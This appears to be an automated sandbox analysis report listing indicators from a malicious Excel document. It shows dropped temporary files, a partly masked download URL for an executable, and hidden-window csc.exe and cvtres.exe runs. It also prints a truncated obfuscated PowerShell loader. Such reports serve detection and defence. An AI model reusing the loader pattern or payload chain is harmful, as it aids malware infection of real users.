Technical Information
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -WindowStyle Hidden function q83f6 {param($ye2bbaf)$b85943a='p61888d';$caddfb2='';for ($i=0; $i -lt $ye2bbaf.length;$i+=2){$m76de4=[convert]::ToByte($ye2bbaf.Substring($i,2),16);$caddfb2+=[ch...
- %WINDIR%\microsoft.net\framework\v2.0.50727\regsvcs.exe
- %WINDIR%\microsoft.net\framework\v2.0.50727\regsvcs.exe
- %TEMP%\8llnriii.0.cs
- %TEMP%\jakp7nfp.0.cs
- %TEMP%\v6udmplq.dll
- %TEMP%\res2b54.tmp
- %TEMP%\csc2b43.tmp
- %TEMP%\v6udmplq.out
- %TEMP%\v6udmplq.cmdline
- %TEMP%\v6udmplq.0.cs
- %APPDATA%\jac7a2.exe
- %TEMP%\qu7f6lsq.dll
- %TEMP%\rese590.tmp
- %TEMP%\csce570.tmp
- %TEMP%\qu7f6lsq.out
- %TEMP%\qu7f6lsq.cmdline
- %TEMP%\qu7f6lsq.0.cs
- %TEMP%\9k-ubsnq.dll
- %TEMP%\zejzmnq0.dll
- %TEMP%\m2jhpihc.dll
- %TEMP%\resd890.tmp
- %TEMP%\bnfiovux.dll
- %TEMP%\n9d-hgmr.dll
- %TEMP%\resd70a.tmp
- %TEMP%\jakp7nfp.cmdline
- %TEMP%\jakp7nfp.out
- %TEMP%\res9ae6.tmp
- %TEMP%\csc9ae5.tmp
- %TEMP%\ej1zrc90.out
- %TEMP%\ej1zrc90.cmdline
- %TEMP%\ej1zrc90.0.cs
- %TEMP%\y2_evlfm.dll
- %TEMP%\res7c33.tmp
- %TEMP%\csc7c22.tmp
- %TEMP%\y2_evlfm.out
- %TEMP%\y2_evlfm.0.cs
- %TEMP%\9k-ubsnq.0.cs
- %TEMP%\micsro_9.dll
- %TEMP%\res5fb2.tmp
- %TEMP%\csc5fb1.tmp
- %TEMP%\micsro_9.out
- %TEMP%\micsro_9.cmdline
- %TEMP%\micsro_9.0.cs
- %TEMP%\jakp7nfp.dll
- %TEMP%\res3f97.tmp
- %TEMP%\csc3f87.tmp
- %TEMP%\resd4c7.tmp
- %TEMP%\cscd870.tmp
- %TEMP%\resd3dd.tmp
- %TEMP%\bnfiovux.cmdline
- %TEMP%\zejzmnq0.out
- %TEMP%\bnfiovux.0.cs
- %TEMP%\n9d-hgmr.cmdline
- %TEMP%\n9d-hgmr.0.cs
- %TEMP%\zejzmnq0.cmdline
- %TEMP%\zejzmnq0.0.cs
- %TEMP%\smcjm81d.out
- %TEMP%\smcjm81d.cmdline
- %TEMP%\smcjm81d.0.cs
- %TEMP%\uhqoiez3.out
- %TEMP%\uhqoiez3.cmdline
- %TEMP%\uhqoiez3.0.cs
- %TEMP%\6othtmhl.out
- %TEMP%\6othtmhl.cmdline
- %TEMP%\6othtmhl.0.cs
- %TEMP%\8llnriii.out
- %TEMP%\8llnriii.cmdline
- %TEMP%\m2jhpihc.0.cs
- %TEMP%\m2jhpihc.cmdline
- %TEMP%\n9d-hgmr.out
- %TEMP%\bnfiovux.out
- %TEMP%\cscd6f9.tmp
- %TEMP%\csc9193.tmp
- %TEMP%\rescb23.tmp
- %TEMP%\cscd4b7.tmp
- %TEMP%\cscd3bd.tmp
- %TEMP%\csccb12.tmp
- %TEMP%\9k-ubsnq.out
- %TEMP%\uhqoiez3.dll
- %TEMP%\smcjm81d.dll
- %TEMP%\8llnriii.dll
- %TEMP%\y2_evlfm.cmdline
- %TEMP%\ej1zrc90.dll
- %TEMP%\res979f.tmp
- %TEMP%\res96b5.tmp
- %TEMP%\6othtmhl.dll
- %TEMP%\res91a4.tmp
- %TEMP%\res959c.tmp
- %TEMP%\m2jhpihc.out
- %TEMP%\csc978f.tmp
- %TEMP%\csc9695.tmp
- %TEMP%\csc958b.tmp
- %TEMP%\9k-ubsnq.cmdline
- %LOCALAPPDATA%\microsoft\windows\<INETFILES>\content.word\~wrf{47a00d5e-835a-4edd-b84b-4dd6aea12a29}.tmp
- %TEMP%\res91a4.tmp
- %TEMP%\v6udmplq.out
- %TEMP%\v6udmplq.cmdline
- %TEMP%\v6udmplq.pdb
- %TEMP%\v6udmplq.dll
- %TEMP%\csc2b43.tmp
- %TEMP%\res2b54.tmp
- %TEMP%\qu7f6lsq.dll
- %TEMP%\qu7f6lsq.cmdline
- %TEMP%\qu7f6lsq.out
- %TEMP%\qu7f6lsq.pdb
- %TEMP%\v6udmplq.0.cs
- %TEMP%\qu7f6lsq.0.cs
- %TEMP%\rese590.tmp
- %TEMP%\9k-ubsnq.0.cs
- %TEMP%\9k-ubsnq.dll
- %TEMP%\9k-ubsnq.out
- %TEMP%\9k-ubsnq.pdb
- %TEMP%\9k-ubsnq.cmdline
- %TEMP%\m2jhpihc.0.cs
- %TEMP%\m2jhpihc.dll
- %TEMP%\m2jhpihc.cmdline
- %TEMP%\m2jhpihc.out
- %TEMP%\csce570.tmp
- %TEMP%\res3f97.tmp
- %TEMP%\csc3f87.tmp
- %TEMP%\jakp7nfp.dll
- %TEMP%\ej1zrc90.out
- %TEMP%\ej1zrc90.0.cs
- %TEMP%\ej1zrc90.dll
- %TEMP%\csc9ae5.tmp
- %TEMP%\res9ae6.tmp
- %TEMP%\y2_evlfm.cmdline
- %TEMP%\y2_evlfm.0.cs
- %TEMP%\y2_evlfm.pdb
- %TEMP%\y2_evlfm.out
- %TEMP%\y2_evlfm.dll
- %TEMP%\csc7c22.tmp
- %TEMP%\res7c33.tmp
- %TEMP%\micsro_9.cmdline
- %TEMP%\micsro_9.0.cs
- %TEMP%\micsro_9.dll
- %TEMP%\micsro_9.out
- %TEMP%\micsro_9.pdb
- %TEMP%\csc5fb1.tmp
- %TEMP%\res5fb2.tmp
- %TEMP%\jakp7nfp.cmdline
- %TEMP%\jakp7nfp.pdb
- %TEMP%\jakp7nfp.0.cs
- %TEMP%\jakp7nfp.out
- %TEMP%\cscd870.tmp
- %TEMP%\ej1zrc90.cmdline
- %TEMP%\bnfiovux.0.cs
- %TEMP%\bnfiovux.out
- %TEMP%\uhqoiez3.0.cs
- %TEMP%\uhqoiez3.pdb
- %TEMP%\uhqoiez3.dll
- %TEMP%\uhqoiez3.out
- %TEMP%\uhqoiez3.cmdline
- %TEMP%\smcjm81d.out
- %TEMP%\smcjm81d.cmdline
- %TEMP%\smcjm81d.pdb
- %TEMP%\smcjm81d.dll
- %TEMP%\smcjm81d.0.cs
- %TEMP%\6othtmhl.out
- %TEMP%\8llnriii.0.cs
- %TEMP%\8llnriii.out
- %TEMP%\8llnriii.dll
- %TEMP%\8llnriii.cmdline
- %TEMP%\csc978f.tmp
- %TEMP%\res979f.tmp
- %TEMP%\csc9695.tmp
- %TEMP%\res96b5.tmp
- %TEMP%\csc958b.tmp
- %TEMP%\res959c.tmp
- %TEMP%\csc9193.tmp
- %TEMP%\8llnriii.pdb
- %TEMP%\6othtmhl.pdb
- %TEMP%\6othtmhl.dll
- %TEMP%\6othtmhl.cmdline
- %TEMP%\bnfiovux.pdb
- %TEMP%\zejzmnq0.out
- %TEMP%\zejzmnq0.pdb
- %TEMP%\zejzmnq0.dll
- %TEMP%\zejzmnq0.cmdline
- %TEMP%\zejzmnq0.0.cs
- %TEMP%\m2jhpihc.pdb
- %TEMP%\resd890.tmp
- %TEMP%\bnfiovux.cmdline
- %TEMP%\cscd6f9.tmp
- %TEMP%\resd70a.tmp
- %TEMP%\n9d-hgmr.0.cs
- %TEMP%\n9d-hgmr.dll
- %TEMP%\n9d-hgmr.out
- %TEMP%\n9d-hgmr.cmdline
- %TEMP%\n9d-hgmr.pdb
- %TEMP%\cscd4b7.tmp
- %TEMP%\resd4c7.tmp
- %TEMP%\cscd3bd.tmp
- %TEMP%\resd3dd.tmp
- %TEMP%\csccb12.tmp
- %TEMP%\rescb23.tmp
- %TEMP%\6othtmhl.0.cs
- %TEMP%\bnfiovux.dll
- %TEMP%\ej1zrc90.pdb
- http://on####preneur.id/license/brest.exe
- DNS ASK on####preneur.id
- '%APPDATA%\jac7a2.exe'
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -WindowStyle Hidden function q83f6 {param($ye2bbaf)$b85943a='p61888d';$caddfb2='';for ($i=0; $i -lt $ye2bbaf.length;$i+=2){$m76de4=[convert]::ToByte($ye2bbaf.Substring($i,2),16);$caddfb2+=[ch...' (with hidden window)
- '%WINDIR%\microsoft.net\framework64\v2.0.50727\cvtres.exe' /NOLOGO /READONLY /MACHINE:IX86 "/OUT:%TEMP%\RES7C33.tmp" "%TEMP%\CSC7C22.tmp"' (with hidden window)
- '%WINDIR%\microsoft.net\framework64\v2.0.50727\csc.exe' /noconfig /fullpaths @"%TEMP%\y2_evlfm.cmdline"' (with hidden window)
- '%WINDIR%\microsoft.net\framework64\v2.0.50727\cvtres.exe' /NOLOGO /READONLY /MACHINE:IX86 "/OUT:%TEMP%\RES5FB2.tmp" "%TEMP%\CSC5FB1.tmp"' (with hidden window)
- '%WINDIR%\microsoft.net\framework64\v2.0.50727\csc.exe' /noconfig /fullpaths @"%TEMP%\micsro_9.cmdline"' (with hidden window)
- '%WINDIR%\microsoft.net\framework64\v2.0.50727\cvtres.exe' /NOLOGO /READONLY /MACHINE:IX86 "/OUT:%TEMP%\RES3F97.tmp" "%TEMP%\CSC3F87.tmp"' (with hidden window)
- '%WINDIR%\microsoft.net\framework64\v2.0.50727\csc.exe' /noconfig /fullpaths @"%TEMP%\jakp7nfp.cmdline"' (with hidden window)
- '%WINDIR%\microsoft.net\framework64\v2.0.50727\cvtres.exe' /NOLOGO /READONLY /MACHINE:IX86 "/OUT:%TEMP%\RES2B54.tmp" "%TEMP%\CSC2B43.tmp"' (with hidden window)
- '%WINDIR%\microsoft.net\framework64\v2.0.50727\csc.exe' /noconfig /fullpaths @"%TEMP%\v6udmplq.cmdline"' (with hidden window)
- '%WINDIR%\microsoft.net\framework64\v2.0.50727\cvtres.exe' /NOLOGO /READONLY /MACHINE:IX86 "/OUT:%TEMP%\RESE590.tmp" "%TEMP%\CSCE570.tmp"' (with hidden window)
- '%WINDIR%\microsoft.net\framework64\v2.0.50727\csc.exe' /noconfig /fullpaths @"%TEMP%\qu7f6lsq.cmdline"' (with hidden window)
- '%WINDIR%\microsoft.net\framework64\v2.0.50727\cvtres.exe' /NOLOGO /READONLY /MACHINE:IX86 "/OUT:%TEMP%\RESD890.tmp" "%TEMP%\CSCD870.tmp"' (with hidden window)
- '%WINDIR%\microsoft.net\framework64\v2.0.50727\cvtres.exe' /NOLOGO /READONLY /MACHINE:IX86 "/OUT:%TEMP%\RESD70A.tmp" "%TEMP%\CSCD6F9.tmp"' (with hidden window)
- '%WINDIR%\microsoft.net\framework64\v2.0.50727\cvtres.exe' /NOLOGO /READONLY /MACHINE:IX86 "/OUT:%TEMP%\RESD4C7.tmp" "%TEMP%\CSCD4B7.tmp"' (with hidden window)
- '%WINDIR%\microsoft.net\framework64\v2.0.50727\csc.exe' /noconfig /fullpaths @"%TEMP%\9k-ubsnq.cmdline"' (with hidden window)
- '%WINDIR%\microsoft.net\framework64\v2.0.50727\cvtres.exe' /NOLOGO /READONLY /MACHINE:IX86 "/OUT:%TEMP%\RESD3DD.tmp" "%TEMP%\CSCD3BD.tmp"' (with hidden window)
- '%WINDIR%\microsoft.net\framework64\v2.0.50727\csc.exe' /noconfig /fullpaths @"%TEMP%\zejzmnq0.cmdline"' (with hidden window)
- '%WINDIR%\microsoft.net\framework64\v2.0.50727\cvtres.exe' /NOLOGO /READONLY /MACHINE:IX86 "/OUT:%TEMP%\RESCB23.tmp" "%TEMP%\CSCCB12.tmp"' (with hidden window)
- '%WINDIR%\microsoft.net\framework64\v2.0.50727\csc.exe' /noconfig /fullpaths @"%TEMP%\m2jhpihc.cmdline"' (with hidden window)
- '%WINDIR%\microsoft.net\framework64\v2.0.50727\csc.exe' /noconfig /fullpaths @"%TEMP%\bnfiovux.cmdline"' (with hidden window)
- '%WINDIR%\microsoft.net\framework64\v2.0.50727\csc.exe' /noconfig /fullpaths @"%TEMP%\n9d-hgmr.cmdline"' (with hidden window)
- '%WINDIR%\microsoft.net\framework64\v2.0.50727\cvtres.exe' /NOLOGO /READONLY /MACHINE:IX86 "/OUT:%TEMP%\RES979F.tmp" "%TEMP%\CSC978F.tmp"' (with hidden window)
- '%WINDIR%\microsoft.net\framework64\v2.0.50727\cvtres.exe' /NOLOGO /READONLY /MACHINE:IX86 "/OUT:%TEMP%\RES96B5.tmp" "%TEMP%\CSC9695.tmp"' (with hidden window)
- '%WINDIR%\microsoft.net\framework64\v2.0.50727\cvtres.exe' /NOLOGO /READONLY /MACHINE:IX86 "/OUT:%TEMP%\RES959C.tmp" "%TEMP%\CSC958B.tmp"' (with hidden window)
- '%WINDIR%\microsoft.net\framework64\v2.0.50727\cvtres.exe' /NOLOGO /READONLY /MACHINE:IX86 "/OUT:%TEMP%\RES91A4.tmp" "%TEMP%\CSC9193.tmp"' (with hidden window)
- '%WINDIR%\microsoft.net\framework64\v2.0.50727\csc.exe' /noconfig /fullpaths @"%TEMP%\smcjm81d.cmdline"' (with hidden window)
- '%WINDIR%\microsoft.net\framework64\v2.0.50727\csc.exe' /noconfig /fullpaths @"%TEMP%\uhqoiez3.cmdline"' (with hidden window)
- '%WINDIR%\microsoft.net\framework64\v2.0.50727\csc.exe' /noconfig /fullpaths @"%TEMP%\6othtmhl.cmdline"' (with hidden window)
- '%WINDIR%\microsoft.net\framework64\v2.0.50727\csc.exe' /noconfig /fullpaths @"%TEMP%\8llnriii.cmdline"' (with hidden window)
- '%WINDIR%\microsoft.net\framework64\v2.0.50727\csc.exe' /noconfig /fullpaths @"%TEMP%\ej1zrc90.cmdline"' (with hidden window)
- '%WINDIR%\microsoft.net\framework64\v2.0.50727\cvtres.exe' /NOLOGO /READONLY /MACHINE:IX86 "/OUT:%TEMP%\RES9AE6.tmp" "%TEMP%\CSC9AE5.tmp"' (with hidden window)
- '%ProgramFiles%\microsoft office\office14\excel.exe' -Embedding
- '%WINDIR%\microsoft.net\framework64\v2.0.50727\cvtres.exe' /NOLOGO /READONLY /MACHINE:IX86 "/OUT:%TEMP%\RES9AE6.tmp" "%TEMP%\CSC9AE5.tmp"
- '%WINDIR%\microsoft.net\framework64\v2.0.50727\csc.exe' /noconfig /fullpaths @"%TEMP%\ej1zrc90.cmdline"
- '%WINDIR%\microsoft.net\framework64\v2.0.50727\cvtres.exe' /NOLOGO /READONLY /MACHINE:IX86 "/OUT:%TEMP%\RES7C33.tmp" "%TEMP%\CSC7C22.tmp"
- '%WINDIR%\microsoft.net\framework64\v2.0.50727\csc.exe' /noconfig /fullpaths @"%TEMP%\y2_evlfm.cmdline"
- '%WINDIR%\microsoft.net\framework64\v2.0.50727\cvtres.exe' /NOLOGO /READONLY /MACHINE:IX86 "/OUT:%TEMP%\RES5FB2.tmp" "%TEMP%\CSC5FB1.tmp"
- '%WINDIR%\microsoft.net\framework64\v2.0.50727\csc.exe' /noconfig /fullpaths @"%TEMP%\micsro_9.cmdline"
- '%WINDIR%\microsoft.net\framework64\v2.0.50727\cvtres.exe' /NOLOGO /READONLY /MACHINE:IX86 "/OUT:%TEMP%\RES3F97.tmp" "%TEMP%\CSC3F87.tmp"
- '%WINDIR%\microsoft.net\framework64\v2.0.50727\csc.exe' /noconfig /fullpaths @"%TEMP%\jakp7nfp.cmdline"
- '%WINDIR%\microsoft.net\framework64\v2.0.50727\cvtres.exe' /NOLOGO /READONLY /MACHINE:IX86 "/OUT:%TEMP%\RES2B54.tmp" "%TEMP%\CSC2B43.tmp"
- '%WINDIR%\microsoft.net\framework64\v2.0.50727\csc.exe' /noconfig /fullpaths @"%TEMP%\v6udmplq.cmdline"
- '%WINDIR%\microsoft.net\framework64\v2.0.50727\cvtres.exe' /NOLOGO /READONLY /MACHINE:IX86 "/OUT:%TEMP%\RESE590.tmp" "%TEMP%\CSCE570.tmp"
- '%WINDIR%\microsoft.net\framework64\v2.0.50727\csc.exe' /noconfig /fullpaths @"%TEMP%\qu7f6lsq.cmdline"
- '%WINDIR%\microsoft.net\framework64\v2.0.50727\cvtres.exe' /NOLOGO /READONLY /MACHINE:IX86 "/OUT:%TEMP%\RESD890.tmp" "%TEMP%\CSCD870.tmp"
- '%WINDIR%\microsoft.net\framework64\v2.0.50727\cvtres.exe' /NOLOGO /READONLY /MACHINE:IX86 "/OUT:%TEMP%\RESD70A.tmp" "%TEMP%\CSCD6F9.tmp"
- '%ProgramFiles%\microsoft office\office14\excelcnv.exe' -Embedding
- '%WINDIR%\microsoft.net\framework64\v2.0.50727\cvtres.exe' /NOLOGO /READONLY /MACHINE:IX86 "/OUT:%TEMP%\RESD4C7.tmp" "%TEMP%\CSCD4B7.tmp"
- '%WINDIR%\microsoft.net\framework64\v2.0.50727\cvtres.exe' /NOLOGO /READONLY /MACHINE:IX86 "/OUT:%TEMP%\RESD3DD.tmp" "%TEMP%\CSCD3BD.tmp"
- '%WINDIR%\microsoft.net\framework64\v2.0.50727\csc.exe' /noconfig /fullpaths @"%TEMP%\zejzmnq0.cmdline"
- '%WINDIR%\microsoft.net\framework64\v2.0.50727\cvtres.exe' /NOLOGO /READONLY /MACHINE:IX86 "/OUT:%TEMP%\RESCB23.tmp" "%TEMP%\CSCCB12.tmp"
- '%WINDIR%\microsoft.net\framework64\v2.0.50727\csc.exe' /noconfig /fullpaths @"%TEMP%\m2jhpihc.cmdline"
- '%WINDIR%\microsoft.net\framework64\v2.0.50727\csc.exe' /noconfig /fullpaths @"%TEMP%\bnfiovux.cmdline"
- '%WINDIR%\microsoft.net\framework64\v2.0.50727\csc.exe' /noconfig /fullpaths @"%TEMP%\n9d-hgmr.cmdline"
- '%WINDIR%\microsoft.net\framework64\v2.0.50727\cvtres.exe' /NOLOGO /READONLY /MACHINE:IX86 "/OUT:%TEMP%\RES979F.tmp" "%TEMP%\CSC978F.tmp"
- '%WINDIR%\microsoft.net\framework64\v2.0.50727\cvtres.exe' /NOLOGO /READONLY /MACHINE:IX86 "/OUT:%TEMP%\RES96B5.tmp" "%TEMP%\CSC9695.tmp"
- '%WINDIR%\microsoft.net\framework64\v2.0.50727\cvtres.exe' /NOLOGO /READONLY /MACHINE:IX86 "/OUT:%TEMP%\RES959C.tmp" "%TEMP%\CSC958B.tmp"
- '%WINDIR%\microsoft.net\framework64\v2.0.50727\cvtres.exe' /NOLOGO /READONLY /MACHINE:IX86 "/OUT:%TEMP%\RES91A4.tmp" "%TEMP%\CSC9193.tmp"
- '%WINDIR%\microsoft.net\framework64\v2.0.50727\csc.exe' /noconfig /fullpaths @"%TEMP%\smcjm81d.cmdline"
- '%WINDIR%\microsoft.net\framework64\v2.0.50727\csc.exe' /noconfig /fullpaths @"%TEMP%\uhqoiez3.cmdline"
- '%WINDIR%\microsoft.net\framework64\v2.0.50727\csc.exe' /noconfig /fullpaths @"%TEMP%\6othtmhl.cmdline"
- '%WINDIR%\microsoft.net\framework64\v2.0.50727\csc.exe' /noconfig /fullpaths @"%TEMP%\8llnriii.cmdline"
- '%WINDIR%\microsoft.net\framework64\v2.0.50727\csc.exe' /noconfig /fullpaths @"%TEMP%\9k-ubsnq.cmdline"
- '%WINDIR%\microsoft.net\framework\v2.0.50727\regsvcs.exe'